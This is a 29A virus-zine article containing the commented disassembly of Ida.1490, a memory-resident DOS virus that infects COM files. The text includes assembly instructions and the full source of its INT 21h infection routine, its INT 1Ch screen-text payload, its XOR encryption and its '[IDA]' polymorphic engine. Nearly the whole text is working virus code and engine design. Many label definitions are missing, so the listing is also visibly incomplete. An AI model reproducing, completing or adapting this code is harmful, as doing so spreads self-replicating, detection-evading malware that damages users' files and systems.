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29A Issue 03 06 16

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Published in 
 · 28 Dec 2019


comment *
Disassembly by ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ

Ida.1490 is a 1491 bytes parasitic resident COM virus. Infects files at open
file, get or set file attributes, load and execute program and rename file
by appending the virus to the infected file. Ida.1490 has an error handler,
non-destructive payload, second layer 16-bit exclusive OR (XOR) encryption
in file and is polymorphic in file using its internal polymorphic engine.
Ida.1490 is using the Random Decoding Key (RDK) technique.

I would like to thank VirusBuster for providing me the binary of this virus.

Compile Ida.1490 with Turbo Assembler v 5.0 by typing:
TLINK /t /x IDA_1490.OBJ

.model tiny
org 100h ; Origin of Ida.1490

jmp virus_begin

db 0c8h dup(?)
call delta_offset
pop bp ; Load BP from stack
sub bp,offset delta_offset

decrypt_key equ word ptr $+01h ; Decryption key
mov dx,00h ; DX = decryption key

jmp decryptor
xor bx,bx ; First loop

jmp decryptor
mov bh,22h ; Second loop
lea si,[bp+crypt_begin] ; SI = offset of crypt_begin
mov cx,(crypt_end-crypt_begin)

push dx ; Save DX at stack
xor [si],dx ; Decrypt two bytes of encrypted code

inc si ; Increase index register
add dx,'SE' ; Add the sliding key to the decry...

loop decrypt_loop
pop dx ; Load DX from stack

mov cx,(checksum_end-checks_begin)
lea si,[bp+crypt_begin] ; SI = offset of crypt_begin
xor ax,ax ; Zero AX
cld ; Clear direction flag
lodsb ; AL = byte of decrypted code

add ah,al ; AH = checksum

loop checksu_loop

cmp ax,0e101h ; Correct checksum?
je virus_begin_ ; Equal? Jump to virus_begin_

cmp bh,22h ; Second loop?
jne first_loop ; Not equal? Jump to first_loop

inc dh ; Increase high-order byte of decr...

jmp second_loop
mov ax,0deadh ; Ida.1490 function
int 21h
cmp di,1996h ; Already resident?
je virus_exit ; Equal? Jump to virus_exit

mov bx,es ; BX = segment of PSP for current ...
dec bx ; BX = segment of current Memory C...
mov es,bx ; ES = " " " " "

mov byte ptr es:[00h],'Z'

mov ax,cs:[02h] ; AX = segment of first byte beyon...
sub ax,((code_end-virus_begin)/10h)+0ah
mov cs:[02h],ax ; Store segment of first byte beyo...

mov ax,es:[03h] ; AX = size of memory block in par...
sub ax,((code_end-virus_begin)/10h)+0ah
mov es:[03h],ax ; Store size of memory block in pa...

stc ; Set carry flag
adc ax,bx ; AX = segment of the virus
mov es,ax ; ES = " " " "

push es ; Save ES at stack
mov ax,3521h ; Get interrupt vector 21h
int 21h
mov word ptr cs:[bp+int21_addr],bx
mov word ptr cs:[bp+int21_addr+02h],es
pop es

push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)

lea si,[bp+virus_begin] ; SI = offset of virus_begin
xor di,di ; Zero DI
mov cx,(code_end-virus_begin)
cld ; Clear direction flag
rep movsb ; Move the virus to top of memory

mov dx,(int21_virus-virus_begin)

push es ; Save ES at stack
pop ds ; Load DS from stack (ES)

mov ax,2521h ; Set interrupt vector 21h
int 21h

mov ax,351ch ; Get interrupt vector 1ch
int 21h
mov word ptr ds:[(int1c_addr-virus_begin)],bx
mov word ptr ds:[(int1c_addr-virus_begin+02h)],es

mov dx,(int1c_virus-virus_begin)
mov ah,25h ; Set interrupt vector 1ch
int 21h
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)

push cs ; Save CS at stack
pop es ; Load ES from stack (CS)

lea si,[bp+origin_code] ; SI = offset of origin_code
mov di,100h ; DI = offset of beginning of code
movsw ; Move the original code to beginning
movsb ; " " " " " "

xor ax,ax ; Zero AX
xor cx,cx ; Zero CX
cwd ; Zero DX
mov bx,dx ; Zero BX

push 100h ; Save offset of beginning of code...
ret ; Return!

int21_virus proc near ; Interrupt 21h of Ida.1490
pushf ; Save flags at stack
push ax bx cx dx ds es si di

cmp ax,4b00h ; Load and execute program?
je examine_name ; Equal? Jump to examine_name
cmp ah,56h ; Rename file?
je examine_name ; Equal? Jump to examine_name
cmp ah,3dh ; Open file?
je examine_name ; Equal? Jump to examine_name
cmp ah,43h ; Get or set file attributes?
je examine_name ; Equal? Jump to examine_name

jmp int21_exit_
clc ; Clear carry flag
mov cx,80h ; Search through hundred and twent...
xor al,al ; Zero AL
mov di,dx ; DI = offset of filename
cmp al,[di] ; Found end of filename?
je examine_ext ; Equal? Jump to examine_ext

inc di ; Increase index register

loop find_zero

jmp int21_exit_
sub di,04h ; DI = offset of dot in filename
mov al,'.'
cmp al,[di] ; Found dot in filename?
je found_dot ; Equal? Jump to found_dot

jmp int21_exit_
mov si,di ; SI = offset of dot in filename
sub si,06h ; DI = offset within filename

mov ax,[si] ; AX = two bytes of the filename
and ax,1101111111011111b
je int21_exit ; Equal? Jump to int21_exit

inc di ; DI = offset within file extension
mov al,[di] ; AL = byte of file extension
and al,11011111b ; Upcase character
cmp al,'C' ; COM executable?
jne int21_exit ; Not equal? Jump to int21_exit

inc di ; DI = offset within file extension
mov al,[di] ; AL = byte of file extension
and al,11011111b ; Upcase character
cmp al,'O' ; COM executable?
jne int21_exit ; Not equal? Jump to int21_exit

inc di ; DI = offset within file extension
mov al,[di] ; AL = byte of file extension
and al,11011111b ; Upcase character
cmp al,'M' ; COM executable?
je infect_file ; Equal? Jump to infect_file
jmp int21_exit_
call int24_store

mov ax,4300h ; Get file attributes
call int21_simula

xor ch,ch ; CH = new file attributes
db 81h,0e1h,0feh,0ffh ; AND CX,0FFFEh
mov ax,4301h ; Set file attributes
call int21_simula
mov ax,3d02h ; Open file (read/write)
call int21_simula
jc infect_exit ; Error? Jump to infect_exit
xchg ax,bx ; BX = file handle

mov ax,4200h ; Set current file position (SOF)
call set_file_pos

push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)

mov ah,3fh ; Read from file
mov cx,03h ; Read three bytes
mov dx,(origin_code-virus_begin)
call int21_simula

cmp word ptr ds:[(origin_code-virus_begin)],'ZM'
je close_file ; Equal? Jump to close_file

mov ax,5700h ; Get file's date and time
call int21_simula
mov ds:[(file_time-virus_begin)],cx
mov ds:[(file_date-virus_begin)],dx

mov ax,4202h ; Set current file position (EOF)
mov dx,-02h ; CX:DX = offset from origin of ne...
mov cx,-01h ; " " " " " " "
call int21_simula

mov ah,3fh ; Read from file
mov cx,02h ; Read two bytes
mov dx,(infect_mark-virus_begin)
call int21_simula

mov si,dx ; SI = offset of infect_mark
mov dx,ds:[(infect_mark_-virus_begin)]
cmp [si],dx ; Already infected?
je close_file ; Equal? Jump to close_file

mov ax,4200h ; Set current file position (SOF)
call set_file_pos

mov ax,4202h ; Set current file position (EOF)
call set_file_pos

cmp ax,0f230h ; Filesize too large?
ja close_file ; Above? Jump to close_file
cmp ax,100h ; Filesize too small?
jb close_file ; Below? Jump to close_file

mov ds:[(filesize-virus_begin)],ax

sub ax,03h ; AX = offset of virus within infe...
mov ds:[(infect_code-virus_begin+01h)],ax

push bx ; Save BX at stack
call ida_poly
pop bx ; Load BX from stack
cmp ax,0ffffh ; Insufficient memory?
je close_file ; Error? Jump to close_file

mov ah,40h ; Write to file
xor dx,dx ; DX = offset of decryptor
mov cx,ds:[(decrypt_len-virus_begin)]

push es ; Save ES at stack
pop ds ; Load DS from stack (ES)

call int21_simula

mov ah,40h ; Write to file
mov dx,100h ; DX = offset of encrypted code
mov cx,(code_end-virus_begin)
call int21_simula

mov ah,49h ; Free memory
call int21_simula

push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)

mov ax,4200h ; Set current file position (SOF)
call set_file_pos

mov ah,40h ; Write to file
mov dx,(infect_code-virus_begin)
mov cx,03h ; Write three bytes
call int21_simula

mov ax,5701h ; Set file's date and time
mov dx,cs:[(file_date-virus_begin)]
mov cx,cs:[(file_time-virus_begin)]
call int21_simula
mov ah,3eh ; Close file
call int21_simula
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)

mov dx,ds:[(int24_addr-virus_begin)]

push word ptr ds:[(int24_addr-virus_begin+02h)]
pop ds ; Load DS from stack (high-order ...)

mov ax,2524h ; Set interrupt vector 24h
call int21_simula
pop di si es ds dx cx bx ax

cmp ax,0deadh ; Ida.1490 function?
je ida_function ; Equal? Jump to ida_function

popf ; Load flags from stack

jmp dword ptr cs:[(int21_addr-virus_begin)]

int24_store proc near ; Get and set interrupt vector 24h
push ds dx bx es ; Save registers at stack

mov ax,3524h ; Get interrupt vector 24h
call int21_simula

push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)

mov word ptr ds:[(int24_addr-virus_begin)],bx
mov word ptr ds:[(int24_addr-virus_begin+02h)],es

mov ah,25h ; Get interrupt vector 24h
mov dx,(int24_virus-virus_begin)
call int21_simula

pop es bx dx ds ; Load registers from stack

ret ; Return!

int24_virus proc near ; Interrupt 24h of Ida.1490
mov al,03h ; Fail system call in progress

iret ; Interrupt return!
mov di,1996h ; Already resident

popf ; Load flags from stack

iret ; Interrupt return!

origin_code db 11001101b,00100000b,?
infect_code db 11101001b,?,? ; JMP imm16 (opcode 0e9h)
file_date dw ? ; File date
file_time dw ? ; File time

set_file_pos proc near ; Set current file position
xor cx,cx ; CX:DX = offset from origin of ne...
cwd ; " " " " " " "
call int21_simula

ret ; Return!

int21_simula proc near ; Simulate interrupt 21h
pushf ; Save flags at stack

db 10011010b ; CALL imm32 (opcode 9ah)
int21_addr dd ? ; Address of interrupt 21h

ret ; Return!

int1c_virus proc near ; Interrupt 1Ch of Ida.1490
push ds es ax dx cx di si

cmp cs:[clock_tick],00h ; Twenty clock ticks?
jae exam_txt_vid ; Above or equal? Jump to exam_txt...

jmp dec_clock_ti

i_love_veron db 'IVeronika !' ; Text to replace with
vera db 'VERA' ; Text to search for
clock_tick db ? ; Clock tick counter
mov byte ptr cs:[(clock_tick-virus_begin)],14h

mov ax,0b800h ; AX = segment of text video RAM
mov es,ax ; ES = " " " " "
mov di,0fa0h ; DI = offset of end of text video...
sub di,08h ; DI = offset within text video RAM

clc ; Clear carry flag
mov al,es:[di] ; AL = byte within text video RAM
and al,11011111b ; Upcase character
cmp al,'V' ; V?
je found_v ; Equal? Jump to found_v

dec di ; Decrease index register
dec di ; Decrease index register
cmp di,1388h ; Past the end of text video RAM?
jb search_v_ ; Below? Jump to search_v_

jmp int1c_exit
mov cx,(vera_end-vera_begin)
mov si,(vera-virus_begin)

push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)

cld ; Clear direction flag
mov al,es:[di] ; AL = byte within text video RAM
and al,11011111b ; Upcase character

cmp [si],al ; VERA?
jne search_v ; Not equal? Jump to search_v

inc di ; Increase index register
inc di ; Increase index register

inc si ; Increase index register

loop search_vera

mov cx,(i_love_v_end-i_love_begin)
sub di,08h ; DI = offset within text video RAM
mov si,(i_love_veron-virus_begin)
movsb ; Move twelve bytes within text vi...

inc di ; Increase index register

loop move_i__loop
dec byte ptr cs:[(clock_tick-virus_begin)]
pop si di cx dx ax es ds

db 11101010b ; JMP imm32 (opcode 0eah)
int1c_addr dd ? ; Address of interrupt 1ch
filesize dw ? ; Low-order word of filesize
int24_addr dd ? ; Address of interrupt 24h

Ida.1490 (polymorphic engine) ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
Disassembly by ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ

Garbage instructions:

Count/index registers:

Registers holding the decryption key:
AX; (BX); CX; DX

One to fourteen garbage instruction(s).
MOV reg16,imm16 (Register holding decryption key, decryption key)
One to fourteen garbage instruction(s).
MOV reg16,imm16 (Count/index register, offset of encrypted code)
One to fourteen garbage instruction(s).
NOT [reg16]/NEG [reg16]/XOR [reg16],reg16
One to fourteen garbage instruction(s).
INC reg16 (Increase count/index register)
One to fourteen garbage instruction(s).
CMP reg16,imm16 (End of encrypted code)
One to fourteen garbage instruction(s).
JB imm8 (Garbage generation above decryption algorithm)
One to fourteen garbage instruction(s).

Min. decryptor size: 19 bytes.
Max. decryptor size: 113 bytes.

ida_poly proc near ; Ida.1490 (polymorphic engine)
mov ah,48h ; Allocate memory
mov bx,(code_end-virus_begin)/10h+8ah
call int21_simula
jnc ida_poly_ ; No error? Jump to ida_poly_

mov ax,0ffffh ; Insufficient memory

ret ; Return!
mov es,ax ; ES = segment of allocated memory
mov ds:[(cryptor_addr-virus_begin+02h)],ax

mov word ptr ds:[(mov_r16_off_-virus_begin)],00h
mov word ptr ds:[(mov_r16_off-virus_begin)],00h
call get_rnd_num

mov ax,0fh ; Random number within fifteen
call rnd_in_range

or di,di ; Don't generate any garbage inst...?
jz gen_garbage ; Zero? Jump to gen_garbage

mov cx,di ; CX = number of one byte garbage ...
xor di,di ; DI = offset of decryptor
push di ; Save DI at stack
call get_rnd_num

mov ax,(one_byte_end-one_by_begin)
call rnd_in_range

lea si,[di+(one_by_table-virus_begin)]
pop di ; Load DI from stack

cld ; Clear direction flag
lodsb ; INC reg16/DEC reg16/NOP/CLD/CBW/...
stosb ; Store INC reg16/DEC reg16/NOP/CL...

loop gen_garbage_

mov ds:[(mov_r16_off_-virus_begin)],di

call get_rnd_num

mov ax,(crypt_ta_end-crypt__begin)/07h
call rnd_in_range

mov ax,(crypt_ta_end-crypt__begin)/11h
mul di ; AX = random number within twenty...

push es ; Save ES at stack
push cs ; Save CS at stack
pop es ; Load ES from stack (CS)

mov si,(crypt_table-virus_begin)
add si,ax ; SI = offset within crypt_table
mov ds:[(crypt_offset-virus_begin)],si

mov di,(crypt_algo-virus_begin)
cld ; Clear direction flag
movsw ; Move NOT [reg16]/NEG [reg16]/XOR...
pop es ; Load ES from stack

call move_algo

cmp byte ptr ds:[(mov_r16_i16_-virus_begin)],00h
je gen_mov_reg ; No encryption/decryption key? Ju...

mov di,ds:[(mov_r16_off_-virus_begin)]
mov si,(mov_r16_i16_-virus_begin)
lodsb ; MOV reg16,imm16 (Decryption key)
stosb ; Store MOV reg16,imm16 (Decrypti...)
inc di ; Increase index register
inc di ; Increase index register
call gen_garbag_

add word ptr ds:[(mov_r16_off-virus_begin)],03h
mov di,ds:[(mov_r16_off_-virus_begin)]
add di,ds:[(mov_r16_off-virus_begin)]

mov ds:[(mov_r16_of_-virus_begin)],di
mov si,(mov_r16_i16-virus_begin)
cld ; Clear direction flag
lodsb ; MOV reg16,imm16 (Offset of encr...)
stosb ; Store MOV reg16,imm16 (Offset o...)
inc di ; Increase index register
inc di ; Increase index register
call gen_garbag_

mov si,(crypt_algo-virus_begin)
cld ; Clear direction flag
lodsw ; NOT [reg16]/NEG [reg16]/XOR [reg...
stosw ; Store NOT [reg16]/NEG [reg16]/XO...
call gen_garbag_

mov si,ds:[(crypt_offset-virus_begin)]
add si,05h ; SI = offset of INC reg16 within ...
cld ; Clear direction flag
lodsb ; INC reg16
stosb ; Store INC reg16
call gen_garbag_

mov ds:[(cmp_r16_off-virus_begin)],di
mov si,(cmp_r16_i16-virus_begin)
cld ; Clear direction flag
lodsw ; CMP reg16,imm16 (End of encrypt...)
stosw ; Store CMP reg16,imm16 (End of e...)
inc di ; Increase index register
inc di ; Increase index register
call gen_garbag_

mov si,(jb_imm8-virus_begin)
mov ds:[(jb_imm8_off-virus_begin)],di
cld ; Clear direction flag
lodsw ; JB imm8 (Garbage generation abo...)
stosw ; Store JB imm8 (Garbage generati...)
call gen_garbag_
mov ds:[(decrypt_len-virus_begin)],di

mov di,ds:[(mov_r16_off_-virus_begin)]
inc di ; DI = offset of MOV reg16,imm16 ...
call get_rnd_num
clc ; Clear carry flag
mov es:[di],bx ; Store encryption/decryption key

mov di,ds:[(mov_r16_of_-virus_begin)]
inc di ; DI = offset of MOV reg16,imm16 ...
mov word ptr es:[di],100h

mov di,ds:[(cmp_r16_off-virus_begin)]
inc di ; DI = offset of CMP reg16,imm16 ...
inc di ; DI = " " " " "
mov word ptr es:[di],(code_end-virus_begin-03h)+100h

mov di,ds:[(jb_imm8_off-virus_begin)]
inc di ; DI = offset of JB imm8 (Garbage...)
mov ax,ds:[(jb_imm8_off-virus_begin)]
sub ax,ds:[(mov_r16_of_-virus_begin)]
mov bl,01h ; BL = 8-bit immediate
sub bl,al ; BL = " "
mov es:[di],bl ; Store 8-bit immediate

mov cx,(code_end-virus_begin)
mov si,(virus_begin-virus_begin)
mov di,100h ; DI = offset of plain code
rep movsb ; Move plain code within segment o...

mov cx,(crypt_end-crypt_begin)
call get_rnd_num

push bx ; Save BX at stack
mov ax,2080h ; Random number within thirty-two ...
call rnd_in_range

xchg ax,di ; DI = random number within thirty...
sub bh,al ; BX = decryption key
mov di,(crypt_begin-virus_begin+100h)
mov es:[(decrypt_key-virus_begin+100h)],bx
pop bx ; Load BX from stack
xor es:[di],bx ; Encrypt two bytes of plain code

add bx,'SE' ; Add the sliding key to the encry...
inc di ; Increase index register

loop encrypt_loop

mov di,ds:[(decrypt_len-virus_begin)]
mov byte ptr es:[di],11001011b

push ds ; Save DS at stack
push es ; Save ES at stack
pop ds ; Load DS from stack (ES)

pushf ; Save flags at stack
push bp ; Save BP at stack

db 10011010b ; CALL imm32 (opcode 9ah)
cryptor_addr dd 00h ; Address of encryptor/decryptor

pop bp ; Load BP from stack
popf ; Load flags from stack

pop ds ; Load DS from stack

mov dx,ds:[(filesize-virus_begin)]
add dx,ds:[(decrypt_len-virus_begin)]

mov di,ds:[(mov_r16_of_-virus_begin)]
inc di ; DI = offset of MOV reg16,imm16 ...
add dx,100h ; DX = 16-bit immediate
mov es:[di],dx ; Store 16-bit immediate

add dx,(code_end-virus_begin)
mov di,ds:[(cmp_r16_off-virus_begin)]
inc di ; DI = offset of CMP reg16,imm16 ...
inc di ; DI = " " " " "
sub dx,03h ; DX = 16-bit immediate
mov es:[di],dx ; Store 16-bit immediate

ret ; Return!
inc ax ; Increase AX
inc cx ; Increase CX
inc dx ; Increase DX
inc bx ; Increase BX
inc bp ; Increase BP
inc si ; Increase SI
inc di ; Increase DI
dec ax ; Decrease AX
dec cx ; Decrease CX
dec dx ; Decrease DX
dec bx ; Decrease BX
dec bp ; Decrease BP
dec si ; Decrease SI
dec di ; Decrease DI
cld ; Clear direction flag
cbw ; Convert byte to word
cld ; Clear direction flag
seges ; Extra segment as source segment
segds ; Data segment as source segment
inc dx ; Increase DX
segcs ; Code segment as source segment
not byte ptr [si] ; Encrypt/decrypt byte of plain/en...
db 11111110b ; CMP SI,imm16 (opcode 81h,0feh)
db 10111110b ; MOV SI,imm16 (opcode 0beh)
db 00h ; No encryption/decryption key
inc si ; Increase index register
dec si ; Decrease index register

not byte ptr [di] ; Encrypt/decrypt byte of plain/en...
db 11111111b ; CMP DI,imm16 (opcode 81h,0ffh)
db 10111111b ; MOV DI,imm16 (opcode 0bfh)
db 00h ; No encryption/decryption key
inc di ; Increase index register
dec di ; Decrease index register

not byte ptr [bx] ; Encrypt/decrypt byte of plain/en...
db 11111011b ; CMP BX,imm16 (opcode 81h,0fbh)
db 10111011b ; MOV BX,imm16 (opcode 0bbh)
db 00h ; No encryption/decryption key
inc bx ; Increase index register
dec bx ; Decrease index register

neg byte ptr [si] ; Encrypt/decrypt byte of plain/en...
db 11111110b ; CMP SI,imm16 (opcode 81h,0feh)
db 10111110b ; MOV SI,imm16 (opcode 0beh)
db 00h ; No encryption/decryption key
inc si ; Increase index register
dec si ; Decrease index register

neg byte ptr [di] ; Encrypt/decrypt byte of plain/en...
db 11111111b ; CMP DI,imm16 (opcode 81h,0ffh)
db 10111111b ; MOV DI,imm16 (opcode 0bfh)
db 00h ; No encryption/decryption key
inc di ; Increase index register
dec di ; Decrease index register

neg byte ptr [bx] ; Encrypt/decrypt byte of plain/en...
db 11111011b ; CMP BX,imm16 (opcode 81h,0fbh)
db 10111011b ; MOV BX,imm16 (opcode 0bbh)
db 00h ; No encryption/decryption key
inc bx ; Increase index register
dec bx ; Decrease index register

xor [si],ax ; Encrypt/decrypt byte of plain/en...
db 11111110b ; CMP SI,imm16 (opcode 81h,0feh)
db 10111110b ; MOV SI,imm16 (opcode 0beh)
db 10111000b ; MOV AX,imm16 (opcode 0b8h)
inc si ; Increase index register
dec si ; Decrease index register

xor [di],ax ; Encrypt/decrypt byte of plain/en...
db 11111111b ; CMP DI,imm16 (opcode 81h,0ffh)
db 10111111b ; MOV DI,imm16 (opcode 0bfh)
db 10111000b ; MOV AX,imm16 (opcode 0b8h)
inc di ; Increase index register
dec di ; Decrease index register

xor [bx],ax ; Encrypt/decrypt byte of plain/en...
db 11111011b ; CMP BX,imm16 (opcode 81h,0fbh)
db 10111011b ; MOV BX,imm16 (opcode 0bbh)
db 10111000b ; MOV AX,imm16 (opcode 0b8h)
inc bx ; Increase index register
dec bx ; Decrease index register

xor [si],cx ; Encrypt/decrypt byte of plain/en...
db 11111110b ; CMP SI,imm16 (opcode 81h,0feh)
db 10111110b ; MOV SI,imm16 (opcode 0beh)
db 10111001b ; MOV AX,imm16 (opcode 0b9h)
inc si ; Increase index register
dec si ; Decrease index register

xor [di],cx ; Encrypt/decrypt byte of plain/en...
db 11111111b ; CMP DI,imm16 (opcode 81h,0ffh)
db 10111111b ; MOV DI,imm16 (opcode 0bfh)
db 10111001b ; MOV AX,imm16 (opcode 0b9h)
inc di ; Increase index register
dec di ; Decrease index register

xor [bx],cx ; Encrypt/decrypt byte of plain/en...
db 11111011b ; CMP BX,imm16 (opcode 81h,0fbh)
db 10111011b ; MOV BX,imm16 (opcode 0bbh)
db 10111001b ; MOV AX,imm16 (opcode 0b9h)
inc bx ; Increase index register
dec bx ; Decrease index register

xor [si],dx ; Encrypt/decrypt byte of plain/en...
db 11111110b ; CMP SI,imm16 (opcode 81h,0feh)
db 10111110b ; MOV SI,imm16 (opcode 0beh)
db 10111010b ; MOV AX,imm16 (opcode 0bah)
inc si ; Increase index register
dec si ; Decrease index register

xor [di],dx ; Encrypt/decrypt byte of plain/en...
db 11111111b ; CMP DI,imm16 (opcode 81h,0ffh)
db 10111111b ; MOV DI,imm16 (opcode 0bfh)
db 10111010b ; MOV AX,imm16 (opcode 0bah)
inc di ; Increase index register
dec di ; Decrease index register

xor [bx],dx ; Encrypt/decrypt byte of plain/en...
db 11111011b ; CMP BX,imm16 (opcode 81h,0fbh)
db 10111011b ; MOV BX,imm16 (opcode 0bbh)
db 10111010b ; MOV AX,imm16 (opcode 0bah)
inc bx ; Increase index register
dec bx ; Decrease index register

xor [si],bx ; Encrypt/decrypt byte of plain/en...
db 11111110b ; CMP SI,imm16 (opcode 81h,0feh)
db 10111110b ; MOV SI,imm16 (opcode 0beh)
db 10111011b ; MOV AX,imm16 (opcode 0bbh)
inc si ; Increase index register
dec si ; Decrease index register

xor [di],bx ; Encrypt/decrypt byte of plain/en...
db 11111111b ; CMP DI,imm16 (opcode 81h,0ffh)
db 10111111b ; MOV DI,imm16 (opcode 0bfh)
db 10111011b ; MOV AX,imm16 (opcode 0bbh)
inc di ; Increase index register
dec di ; Decrease index register
jb $+02h ; Below? Jump to garbage generaton...

db 00h
db '[IDA] v0.01',00h ; Name of the engine
db 'Serg_Enigma',00h ; Author of the engine
mov_r16_off dw ? ; Offset of MOV reg16,imm16 (Offs...)
mov_r16_off_ dw ? ; Offset of MOV reg16,imm16 (Decr...)
mov_r16_of_ dw ? ; Offset of MOV reg16,imm16 (Offs...)
cmp_r16_off dw ? ; Offset of CMP reg16,imm16 (End ...)
decrypt_len dw ? ; Length of decryptor
jb_imm8_off dw ? ; Offset of JB imm8 (Garbage gene...)
random_count db ? ; Random counter
cmp_r16_i16 db 10000001b ; CMP reg16,imm16 (opcode 81h)
db ? ; CMP reg16,imm16 (End of encrypt...)
mov_r16_i16 db ? ; MOV reg16,imm16 (Offset of encr...)
mov_r16_i16_ db ? ; MOV reg16,imm16 (Decryption key)
inc_reg16 db ? ; INC reg16 (Index register)
dec_reg16 db ? ; DEC reg16 (Index register)
crypt_algo dw ? ; NOT [reg16]/NEG [reg16]/XOR [reg...
random_off dw ? ; Random offset
crypt_offset dw ? ; Offset of encryption/decryption ...

move_algo proc near ; Move encryption/decryption algor...
push es ; Save ES at stack

push cs ; Save CS at stack
pop es ; Load ES from stack (CS)

push di si ; Save registers at stack
mov si,ds:[(crypt_offset-virus_begin)]
inc si ; SI = offset of CMP reg16,imm16 w...
inc si ; SI = " " " " "

mov di,(crypt_table_-virus_begin)
mov cx,(crypt_b_end_-crypt_begin_)
rep movsb ; Move encryption/decryption algor...
pop si di ; Load registers from stack

pop es ; Load ES from stack

ret ; Return!

gen_garbag_ proc near ; Generate garbage
xchg di,dx ; DX = offset within segment of al...
call get_rnd_num

mov ax,0fh ; Random number within fifteen
call rnd_in_range

or di,di ; Don't generate any garbage inst...?
jz gen_garbag__ ; Zero? Jump to gen_garbag__

mov cx,di ; CX = number of one byte garbage ...
mov ds:[(mov_r16_off-virus_begin)],cx
call get_rnd_num

mov ax,(one_byte_end-one_by_begin)
call rnd_in_range

lea si,[di+(one_by_table-virus_begin)]
lodsb ; INC reg16/DEC reg16/NOP/CLD/CBW/...

cmp al,ds:[(inc_reg16-virus_begin)]
je gen_garba_ ; Equal? Jump to gen_garba_
cmp al,ds:[(dec_reg16-virus_begin)]
je gen_garba_ ; Equal? Jump to gen_garba_

mov di,dx ; DI = offset within segment of al...
cld ; Clear direction flag
stosb ; Store INC reg16/DEC reg16/NOP/CL...

mov dx,di ; DX = offset within segment of al...

loop gen_garba_

ret ; Return!

rnd_in_range proc near ; Random number within range
push ax bx cx dx ; Save registers at stack

xchg dx,bx ; DX = 16-bit random number
xor bx,bx ; Zero BX

mov cx,0ffffh ; Compare 8-bit random number with...
mov bh,ah ; BH = random number within range
call cmp_rnd_num_

inc bh ; Increase random number within range
cmp bh,al ; Compare random number within ran...
jne cmp_rnd_num ; Not equal? Jump to cmp_rnd_num

loop rnd_in_loop

ret ; Return!
xor bl,bl ; Zero BL
xchg bh,bl ; BX = random number within range
mov di,bx ; DI = " " " "

pop dx cx bx ax ; Load registers from stack

cld ; Clear direction flag

ret ; Return!

cmp_rnd_num_ proc near ; Compare 8-bit random number with...
inc bl ; Increase low-order byte of base ...

cmp bl,dl ; Compare 8-bit random number wit...?
je rnd_in_exit_ ; Equal? Jump to rnd_in_exit_

ret ; Return!
pop cx ; Load CX from stack

jmp rnd_in_exit

get_rnd_num proc near
push ax dx es di cx ; Save registers at stack

in ax,40h ; AX = 16-bit random number
xchg ax,dx ; DX = " " "

inc byte ptr ds:[(random_count-virus_begin)]

mov ax,0f800h ; AX = segment within system BIOS/ROM
mov es,ax ; ES = " " " "

mov di,ds:[(random_off-virus_begin)]
xor dx,es:[di] ; DX = 16-bit random number
mov ds:[(random_off-virus_begin+200h)],dx

mov cl,ds:[(random_count-virus_begin+200h)]
rol dx,cl ; DX = 16-bit random number
mov bx,dx ; BX = " " "

pop cx di es dx ax ; Load registers from stack

cld ; Clear direction flag

ret ; Return!
infect_mark dw ? ; Infection mark
infect_mark_ db ' ' ; " "

end code_begin

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